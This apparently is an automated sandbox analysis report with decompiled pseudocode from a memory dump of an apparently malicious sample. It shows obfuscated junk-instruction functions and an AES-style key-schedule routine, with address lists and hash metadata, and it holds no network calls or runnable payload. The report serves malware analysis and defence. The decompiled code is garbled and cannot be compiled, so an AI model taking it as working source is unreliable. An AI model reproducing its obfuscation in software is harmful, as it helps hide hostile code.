												_t21 = __ebp;
												__ebp =  *0x696f8b6e;
												 *0x696f8b6e = _t21;
												_push( *0xe00486c2);
												__ebx = __ebx &  *0x110fe9be;
												__ebx = __ebx &  *0x13a4621f;
												__esp = __esp & 0x740fd8f7;
												asm("sbb bh, 0x32");
												__al =  *0x1e07c81a;
												asm("adc eax, [0x390eca6e]");
												__eax = 0x4119b6ff;
												__bh = __bh - 0x63;
												asm("sbb esp, [0x69c44127]");
												asm("adc bh, [0x42e48d88]");
												 *0x1ecfe702 =  *0x1ecfe702 | 0x000000b5;
												 *0x8e578be5 = __ch;
												asm("sbb [0x3f542915], eax");
												asm("rcl dword [0x4a5d476c], 0x7a");
												_pop(__ecx);
												__ah = __ah ^  *0x95be30b3;
												__esi = (0x3a8b1f96 ^  *0x4131e18e) &  *0x6dabf7ed |  *0x4720831e;
												asm("sbb bh, 0xb7");
												__ebp =  *0x92983c23;
												 *0x92983c23 =  *0x696f8b6e;
												asm("rol dword [0x5dcd849b], 0xc");
												 *0x4baa2420 =  *0x4baa2420 << 0xbc;
												_push( *0x7cb94c2);
												 *0xbd3f3203 =  *0xfee330e8 - 1;
												__eax = 0x4119b6ff ^  *0x30928dcf;
												asm("rcr dword [0xc1df1033], 0xca");
												asm("sbb esi, [0xd66ec7b9]");
												 *0x58e2b9bb = __ebx;
												if(( *0xee1a129c & 0x4119b6ff) <= 0) {
													goto L1;
												} else {
													__ebp =  *0x9788b37e * 0x20de;
													__edx = 0xffffffffaf425c46;
													 *0x37cebf96 =  *0x37cebf96 >> 0x96;
													asm("adc [0x291187f2], ah");
													_push(0x4119b6ff);
													if( *0x37cebf96 >= 0) {
														goto L1;
													} else {
														__esp =  *0x3d93d079;
														__dl = __dl &  *0x9e7ef122;
														__edi =  *0x5fc51e60 * 0x8706;
														asm("sbb eax, [0xa8c59cc2]");
														asm("adc [0x52f2922], al");
														asm("rcl dword [0xef887eed], 0x17");
														asm("sbb bh, [0x3bdf8e00]");
														__ecx = __ecx &  *0x8403a65;
														asm("ror dword [0x3e042c17], 0x50");
														if(__ecx <= 0) {
															goto L1;
														} else {
															__eax =  *0xdd1e517e * 0xc030;
															__cl = 4;
															asm("adc [0xef3a2e2c], cl");
															__esi = __esi +  *0xd0b12fa3;
															_push(__edi);
															asm("ror dword [0x94b7daf0], 0x5a");
															__edi = __edi + 1;
															asm("ror dword [0xd5887ffd], 0x74");
															__al = __al ^  *0xa658f32c;
															__esi = __esi -  *0x8e738a66;
															__dh = __dh |  *0xb0f174b4;
															__edx =  *0xcc168203;
															if(__dh > 0) {
																goto L1;
															} else {
																asm("sbb ecx, [0x33639477]");
																__dh = 0xb7;
																asm("adc ebx, [0x235afa2b]");
																return __eax;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0121cf7d
0x0121cf82
0x0121cf87
0x0121cf74
0x0121cf7b
0x0121cf89
0x0121cf89
0x0121cf8f
0x0121cf92
0x0121cf93
0x0121cf99
0x0121cf9f
0x0121cfa9
0x0121cfaf
0x0121cfb2
0x0121cfb9
0x0121cfbe
0x0121cfc4
0x00000000
0x0121cfc6
0x0121cfc6
0x0121cfd0
0x0121cfd1
0x0121cfd7
0x0121cfdd
0x0121cfde
0x0121cfe3
0x0121cfec
0x0121cff2
0x0121cff8
0x0121d004
0x0121d00a
0x0121d010
0x0121d017
0x0121d01d
0x0121d029
0x0121d02f
0x0121d035
0x0121d041
0x0121d047
0x0121d053
0x0121d059
0x0121d05f
0x00000000
0x0121d065
0x0121d065
0x0121d06f
0x0121d076
0x0121d077
0x0121d07e
0x00000000
0x0121d084
0x0121d084
0x0121d08a
0x0121d090
0x0121d096
0x0121d09c
0x0121d0a3
0x0121d0ae
0x0121d0b4
0x0121d0ba
0x0121d0c1
0x00000000
0x0121d0c7
0x0121d0cd
0x0121d0ce
0x0121d0cf
0x0121d0d5
0x0121d0e2
0x0121d0ee
0x0121d0f4
0x0121d0fa
0x0121d0ff
0x0121d105
0x0121d106
0x0121d106
0x0121d106
0x0121d10c
0x0121d112
0x00000000
0x0121d118
0x0121d118
0x0121d11e
0x0121d125
0x0121d12c
0x0121d12e
0x0121d134
0x0121d13a
0x0121d141
0x0121d14d
0x0121d14f
0x0121d150
0x0121d153
0x0121d159
0x0121d15a
0x00000000
0x0121d160
0x0121d160
0x0121d16a
0x0121d171
0x0121d177
0x0121d181
0x0121d18d
0x0121d194
0x0121d19a
0x0121d19a
0x0121d19a
0x0121d1a0
0x0121d1a6
0x0121d1ac
0x0121d1ad
0x0121d1b3
0x0121d1b9
0x0121d1bf
0x00000000
0x0121d1c5
0x0121d1c5
0x0121d1d1
0x0121d1dd
0x0121d1e4
0x0121d1ea
0x0121d1eb
0x0121d1ee
0x0121d1ef
0x0121d1f6
0x0121d1f7
0x0121d203
0x0121d209
0x0121d210
0x0121d211
0x0121d218
0x0121d21a
0x0121d220
0x0121d226
0x0121d227
0x0121d22d
0x0121d233
0x0121d239
0x0121d244
0x0121d245
0x0121d24c
0x0121d252
0x0121d25e
0x0121d265
0x0121d26c
0x0121d278
0x0121d279
0x0121d27f
0x0121d285
0x0121d28a
0x0121d290
0x0121d297
0x0121d29d
0x0121d2a3
0x0121d2aa
0x0121d2ab
0x0121d2ab
0x0121d2ab
0x0121d2b1
0x0121d2b7
0x0121d2c3
0x0121d2c9
0x0121d2cf
0x0121d2d2
0x0121d2d7
0x0121d2dd
0x0121d2e2
0x0121d2e5
0x0121d2eb
0x0121d2f1
0x0121d2f7
0x0121d2fd
0x0121d303
0x0121d30a
0x0121d30b
0x0121d317
0x0121d31d
0x0121d326
0x0121d326
0x0121d32c
0x0121d333
0x0121d33a
0x0121d340
0x0121d34c
0x0121d352
0x0121d359
0x0121d35f
0x0121d36b
0x00000000
0x0121d371
0x0121d371
0x0121d381
0x0121d387
0x0121d38e
0x0121d394
0x0121d395
0x00000000
0x0121d39b
0x0121d39b
0x0121d3a7
0x0121d3ad
0x0121d3bd
0x0121d3c3
0x0121d3c9
0x0121d3d0
0x0121d3d6
0x0121d3dc
0x0121d3e3
0x00000000
0x0121d3e9
0x0121d3e9
0x0121d3f3
0x0121d3f6
0x0121d3fc
0x0121d402
0x0121d406
0x0121d40d
0x0121d40e
0x0121d415
0x0121d41b
0x0121d421
0x0121d427
0x0121d42d
0x00000000
0x0121d433
0x0121d433
0x0121d439
0x0121d43b
0x0121d441
0x0121d441
0x0121d42d
0x0121d3e3
0x0121d395
0x0121d36b
0x0121d1bf
0x0121d15a
0x0121d112
0x0121d0c1
0x0121d07e
0x0121d05f
0x0121cfc4

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195dd88a9c834b5bdbb2aba367cbc69555be165d72fed6f107d7e7567200e92b
Instruction ID: acd6229f0ae645372f862d42ca2fa95b166232445d3680ee85ab1cdfd6559bca
Opcode Fuzzy Hash: 195dd88a9c834b5bdbb2aba367cbc69555be165d72fed6f107d7e7567200e92b
Instruction Fuzzy Hash: 4DC1B632A587A1CFD706CF38D98BB403FB2F362720B48425EC5A1974A6C7742526DF89

Uniqueness

Uniqueness Score: -1.00%

Function 0121B8C3, Relevance: .2, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E0121B8C3(char _a1767234299) {
				void* _v3;
				signed char _t27;
				signed int _t30;
				signed char _t31;
				signed char _t32;
				signed char _t33;
				signed int _t34;
				void* _t35;
				void* _t36;
				signed char _t38;
				signed int _t40;
				signed char _t41;
				void* _t43;
				signed int _t45;
				signed char _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				void* _t60;
				signed int _t63;
				signed char _t64;
				signed char _t65;
				signed int _t66;
				signed char _t67;
				signed int _t71;
				signed int _t75;
				void* _t76;
				void* _t77;
				signed int _t79;
				signed int _t83;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t98;
				signed int _t99;

				L1:
				_t88 = _t87 ^  *0x9163d009;
				asm("adc ecx, [0xcb376964]");
				asm("rol dword [0xf5d30d66], 0x56");
				_t64 = _t63 ^ 0x0c5600c5;
				 *0x5024cc08 = _t27;
				if((_t92 + 0x00000001 &  *0x150c2365) > 0) {
					 *0x6fe0ff76 =  *0x6fe0ff76 << 0xd3;
					asm("rcr dword [0xbd9d05ba], 0x13");
					 *0xdc2f2c5 =  *0xdc2f2c5 << 0xdf;
					 *0x12644fe5 =  *0x12644fe5 ^ _t34;
					 *0xbf7d8c13 =  *0xbf7d8c13 | _t88;
					asm("sbb edi, [0x10b0771d]");
					asm("sbb esp, [0x9fc9fd8]");
					asm("ror byte [0x5838e010], 0x8");
					 *0xc879156f = _t79;
					_pop(_t49);
					_t50 = _t49 &  *0xdb161904;
					_t65 = _t64 ^ 0x0000000a;
					 *0x4f4209e3 =  *0x4f4209e3 | _t50;
					 *0x51056664 =  *0x51056664 | _t50;
					asm("sbb cl, 0xca");
					_t30 = (_t27 | 0x0000000a) +  *0xda085b12 |  *0xac2d4fd;
					 *0xe1755d15 =  *0xe1755d15 << 0x62;
					 *0x680cba93 =  *0x680cba93 - _t65;
					_t83 = _t79 +  *0x5fe0d3d6 - 0x2c51de2b &  *0x40e196fb |  *0xdae16ea9;
					 *0x2c370fe3 =  *0x2c370fe3 + _t65;
					_pop(_t35);
					 *0x6e061a9 = 0xbedcb08c;
					asm("adc ebp, [0x52d49b1d]");
					asm("sbb eax, 0x12a494ff");
					_t36 = _t35 + 1;
					if(_t36 >= 0) {
						_t51 = _t50 ^  *0xdbbbf70;
						asm("adc edx, 0x1952642d");
						 *0x76c50992 =  *0x76c50992 & _t83;
						 *0x919f2be0 =  *0x919f2be0 | _t51;
						if(( *0xedfcdea9 & _t83) < 0) {
							asm("sbb ebx, 0x53bd4679");
							_t31 = _t30 -  *0xe4a51cc0;
							_push(0x2f0942b);
							if(_t31 > 0) {
								_t52 = _t51 |  *0x813dd98b;
								_t66 = _t65 - 0x8c15642f;
								asm("sbb esp, [0xe01de28f]");
								 *0x2639eabb = _t83;
								 *0xefa5bc84 =  *0xefa5bc84 + _t52;
								asm("ror dword [0x7b28cfc4], 0x54");
								L1();
								asm("adc ecx, [0x2ada94e8]");
								 *0x6c393ca1 =  *0x6c393ca1 << 0x40;
								asm("sbb bh, 0x80");
								_push( *0xb683323b);
								_t75 =  *0xd903bc7e * 0x0000334b |  *0x1ecd1601;
								_t38 = _t36 + 0xb1;
								asm("rol dword [0xd2c8be91], 0x68");
								if(_t52 - 1 + 1 < 0) {
									_t85 =  *0x55cddf6b * 0x3572;
									_t55 =  *0x381c8a2c;
									_t32 =  *0x2fb03f39;
									 *0x2fb03f39 = _t31;
									asm("cmpsb");
									 *0x2f9dcb98 = _t38 ^ 0x000000e3;
									_t67 = _t66 |  *0x9ba87299;
									 *0x70375589 =  *0x70375589 + _t85;
									_t76 = _t75 + 0xd11d7961;
									asm("adc [0x7d6689fc], ebp");
									 *0x5e5fddb1 =  *0x5e5fddb1 & _t32;
									_push( *0x22c253c0);
									if( *0x5e5fddb1 >= 0) {
										asm("sbb [0xbcec1c78], esp");
										_pop(_t40);
										 *0x1b12efe2 =  *0x1b12efe2 & _t67;
										_t86 = _t85 | 0x8d0ed5c2;
										asm("sbb bh, 0xb6");
										_t41 = _t40 |  *0x93528deb;
										asm("ror dword [0x15fd090f], 0x9b");
										_push(_t76);
										asm("adc dl, [0x16500fa8]");
										asm("cmpsw");
										 *0xcf540b66 =  *0xcf540b66 & _t55;
										_t56 =  *0x11f0afa3;
										asm("cmpsw");
										 *0x13d5e90b =  *0x13d5e90b >> 0x3f;
										_t98 =  *0xa4674d65;
										asm("scasb");
										asm("sbb bl, [0x59c45e1]");
										_t77 = _t76 + 1;
										if(_t77 == 0) {
											 *0xdde5027b =  *0xdde5027b - _t98;
											 *0xb37e1e3b =  *0xb37e1e3b << 0x2c;
											_t87 =  &_a1767234299;
											 *0x3eae01c4 =  *0x3eae01c4 & _t56;
											 *0x81240e12 =  *0x81240e12 ^ 0x0000003c;
											_t33 = _t32 -  *0xf4fa55e6;
											asm("ror dword [0x32be08a1], 0xad");
											asm("rcr byte [0xf98450d0], 0xef");
											 *0x12e076c2 = 0x96afe4d3;
											asm("adc [0x1190d6c1], ecx");
											asm("rcl dword [0x77c92321], 0x3a");
											_t71 =  *0xddea0e3e - 0x1d9e641b ^  *0x94517f9d;
											_t57 = _t56 & 0x48820617;
											_t99 = _t98 | 0x1056278e;
											_t43 = (_t41 ^  *0x56f70de0) + 1;
											asm("movsw");
											_push(0x887e48d);
											_push(_t57);
											 *0x43924ed4 = _t57;
											asm("rcr dword [0x11f9e507], 0x58");
											_t60 = ( *0x43924ed4 |  *0xa103c411) +  *0x270a6909;
											if(_t60 == 0) {
												_t63 =  *0xc30a66a2;
												 *0xc30a66a2 = _t71;
												 *0x963752f5 =  *0x963752f5 & _t63;
												 *0xe1db3f =  *0xe1db3f - _t77;
												_t27 = _t33 ^ 0x000000e3;
												 *0x3bfd3517 =  *0x3bfd3517 >> 0xef;
												_t79 = _t86 &  *0x40458d3d;
												asm("sbb ebp, [0x9285ddd6]");
												if(_t79 != 0) {
													asm("lodsd");
													_push(_t99);
													 *0xa2ad5fe2 =  *0xa2ad5fe2 >> 0xbb;
													asm("adc ecx, [0x5c351b2b]");
													_t92 =  *0xe4df1df;
													 *0xe4df1df = _t99;
													asm("rcl dword [0x9989c61], 0xe");
													_t45 = _t43 - 1 + 0x2a;
													 *0x5ac2f796 =  *0x5ac2f796 << 0xc4;
													 *0xbf120f3f =  *0xbf120f3f - (_t60 - 0x00000001 +  *0x3593549d | 0x00000002);
													 *0x6a17ab6f =  *0x6a17ab6f ^ _t27;
													asm("sbb [0xfabb0309], esp");
													 *0x4f6ba01b =  *0x4f6ba01b & _t63;
													 *0x928f09e2 =  *0x928f09e2 | _t27;
													 *0x7cd2d53c =  *0x7cd2d53c << 0xec;
													 *0xeebe58bf =  *0xeebe58bf ^ _t63;
													asm("adc esp, [0xf376bb2d]");
													 *0x656ac2ef =  *0x656ac2ef ^ _t45;
													asm("ror dword [0x7d594e98], 0xf7");
													asm("rcl dword [0xf6af0494], 0x67");
													_push(_t63);
													asm("ror dword [0x517b2e93], 0x6d");
													_t34 = _t45 ^  *0xcdd67b92;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0121b8c6
0x0121b8c6
0x0121b8cd
0x0121b8d3
0x0121b8e5
0x0121b8fd
0x0121b902
0x0121b904
0x0121b90b
0x0121b912
0x0121b925
0x0121b92c
0x0121b932
0x0121b93e
0x0121b94a
0x0121b951
0x0121b957
0x0121b967
0x0121b973
0x0121b976
0x0121b983
0x0121b989
0x0121b98c
0x0121b998
0x0121b9a5
0x0121b9ab
0x0121b9b1
0x0121b9b7
0x0121b9b9
0x0121b9bf
0x0121b9c5
0x0121b9ca
0x0121b9cb
0x0121b9d1
0x0121b9d7
0x0121b9e3
0x0121b9e9
0x0121b9f5
0x0121b9fb
0x0121ba01
0x0121ba07
0x0121ba0c
0x0121ba22
0x0121ba28
0x0121ba2e
0x0121ba34
0x0121ba3b
0x0121ba4d
0x0121ba55
0x0121ba5a
0x0121ba60
0x0121ba68
0x0121ba6b
0x0121ba71
0x0121ba77
0x0121ba7b
0x0121ba82
0x0121ba91
0x0121ba9b
0x0121baa1
0x0121baa1
0x0121baa7
0x0121baa9
0x0121baaf
0x0121bab5
0x0121babb
0x0121bac7
0x0121bacd
0x0121bad3
0x0121bad9
0x0121badf
0x0121bae5
0x0121bae6
0x0121bafe
0x0121bb06
0x0121bb0f
0x0121bb15
0x0121bb1c
0x0121bb1d
0x0121bb23
0x0121bb25
0x0121bb31
0x0121bb37
0x0121bb39
0x0121bb40
0x0121bb46
0x0121bb4d
0x0121bb53
0x0121bb54
0x0121bb5a
0x0121bb6b
0x0121bb72
0x0121bb78
0x0121bb7e
0x0121bb84
0x0121bb8a
0x0121bb91
0x0121bb98
0x0121bba4
0x0121bbb2
0x0121bbbf
0x0121bbc5
0x0121bbcb
0x0121bbd4
0x0121bbd5
0x0121bbd7
0x0121bbdc
0x0121bbdd
0x0121bbe9
0x0121bbf6
0x0121bbfc
0x0121bc08
0x0121bc08
0x0121bc0e
0x0121bc14
0x0121bc1a
0x0121bc1c
0x0121bc23
0x0121bc29
0x0121bc2f
0x0121bc3c
0x0121bc3d
0x0121bc3e
0x0121bc45
0x0121bc51
0x0121bc51
0x0121bc57
0x0121bc5f
0x0121bc62
0x0121bc72
0x0121bc78
0x0121bc7e
0x0121bc8a
0x0121bc96
0x0121bc9c
0x0121bca3
0x0121bca9
0x0121bcaf
0x0121bcb5
0x0121bcbc
0x0121bcc3
0x0121bcc4
0x0121bcd1
0x0121bcd1
0x0121bc2f
0x0121bbfc
0x0121bb54
0x0121bad9
0x0121ba82
0x0121ba0c
0x0121b9f5
0x0121b9cb
0x00000000

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3951234368781bbce8f51805bca5fbd89255baed03e1ab0775da5eafbd2f6451
Instruction ID: 373528bed94780a008433578b45ee6d81805b30e58ee201028a50e8a6f8aca79
Opcode Fuzzy Hash: 3951234368781bbce8f51805bca5fbd89255baed03e1ab0775da5eafbd2f6451
Instruction Fuzzy Hash: 8AA1C63392A789CFD716DF38C89A7463FB1FB02721709025ED8A293186D7302166CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01202D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E01202D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x01202d93
0x01202d98
0x01202da0
0x01202da9
0x01202db3
0x01202dba
0x01202dc3
0x01202dce
0x01202dd6
0x01202ddf
0x01202dea
0x01202df0
0x01202df5
0x01202dfe
0x01202e09
0x01202e11
0x01202e1a
0x01202e25
0x01202e2d
0x01202e36
0x01202e41
0x01202e49
0x01202e52
0x01202e5d
0x01202e65
0x01202e6e
0x01202e80
0x01202e83
0x01202f9f
0x01202fa4
0x01202e89
0x01202e89
0x01202e8c
0x01202e8e
0x01202e91
0x01202e91
0x01202ef6
0x01202efb
0x01202efd
0x01202f03
0x01202f05
0x01202f0b
0x01202f0d
0x01202f10
0x01202f16
0x00000000
0x00000000
0x01202f72
0x01202f78
0x01202f7a
0x01202f80
0x01202f82
0x01202f87
0x01202f88
0x01202f8b
0x01202f8e
0x01202f91
0x01202f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01202f97
0x01202fae
0x01202fae
0x00000000

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 1ab405452e7937244b75db97a102c33ea1136421ccdd7d9d5779fe14f1285a07
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 0B5170B3E14A214BD3188E09CC40631B792FFC8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 01202D89, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E01202D89(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t71;
				signed int* _t84;
				signed int _t97;
				signed int _t99;
				signed int _t109;
				signed int _t111;
				signed int* _t113;
				signed int _t130;
				signed int _t132;
				signed int _t136;
				signed int _t157;
				intOrPtr _t179;

				asm("pushfd");
				asm("invalid");
				asm("adc al, 0x11");
				asm("std");
				asm("adc dword [ebp-0x75], 0x104d8bec");
				_t84 = _a12;
				_t113 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t113 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
				_t66 =  &(_t113[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[3] = _t84[3] & 0xff00ff00 | _t84[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t113[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t66 | 0xffffffff;
				} else {
					_t179 = _a4;
					_t71 = 0;
					_a12 = 0;
					while(1) {
						_t157 =  *(_t66 + 0x18);
						_t97 = ( *(_t179 + 4 + (_t157 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t179 +  &(_t71[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t179 + 4 + (_t157 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 5 + (_t157 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t179 + 4 + (_t157 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t130 =  *_t66 ^ _t97;
						 *(_t66 + 0x1c) = _t97;
						_t99 =  *(_t66 + 4) ^ _t130;
						 *(_t66 + 0x20) = _t130;
						_t132 =  *(_t66 + 8) ^ _t99;
						 *(_t66 + 0x24) = _t99;
						 *(_t66 + 0x28) = _t132;
						if(_t71 == 6) {
							break;
						}
						_t109 = ( *(_t179 + 4 + (_t132 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t179 + 4 + (_t132 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 4 + (_t132 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t179 + 5 + (_t132 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t136 =  *(_t66 + 0x10) ^ _t109;
						 *(_t66 + 0x2c) = _t109;
						_t111 =  *(_t66 + 0x14) ^ _t136;
						 *(_t66 + 0x34) = _t111;
						_t71 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t136;
						 *(_t66 + 0x38) = _t111 ^ _t157;
						_t66 = _t66 + 0x20;
						_a12 = _t71;
						if(_t71 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x01202d89
0x01202d8a
0x01202d8c
0x01202d8e
0x01202d8f
0x01202d93
0x01202d98
0x01202da0
0x01202da9
0x01202db3
0x01202dba
0x01202dc3
0x01202dce
0x01202dd6
0x01202ddf
0x01202dea
0x01202df0
0x01202df5
0x01202dfe
0x01202e09
0x01202e11
0x01202e1a
0x01202e25
0x01202e2d
0x01202e36
0x01202e41
0x01202e49
0x01202e52
0x01202e5d
0x01202e65
0x01202e6e
0x01202e80
0x01202e83
0x01202f9d
0x01202fa4
0x01202e89
0x01202e89
0x01202e8c
0x01202e8e
0x01202e91
0x01202e91
0x01202ef6
0x01202efb
0x01202efd
0x01202f03
0x01202f05
0x01202f0b
0x01202f0d
0x01202f10
0x01202f16
0x00000000
0x00000000
0x01202f72
0x01202f78
0x01202f7a
0x01202f80
0x01202f82
0x01202f87
0x01202f88
0x01202f8b
0x01202f8e
0x01202f91
0x01202f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01202f97
0x01202fae
0x01202fae
0x00000000

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a8d73aad13f971df19815f395c85cefe29b49e05ebf4e2e4952e03b5a8485f
Instruction ID: 6c9410f5ecff9711922f85c126a398c57de638300800f7877afcdd087223cb34
Opcode Fuzzy Hash: 97a8d73aad13f971df19815f395c85cefe29b49e05ebf4e2e4952e03b5a8485f
Instruction Fuzzy Hash: DB5182B3E54A214BD318CF09CC40631B792EFD8312B5F81BEDD199B397CA74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0121C9A8, Relevance: .2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E0121C9A8(void* __ecx, void* __edx) {
				void* _t2;

				asm("adc eax, 0xc2dd0cff");
				L2();
				_pop(_t2);
				return _t2;
			}

0x0121c9aa
0x0121c9b2
0x0121c9b7
0x0121c9b8

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
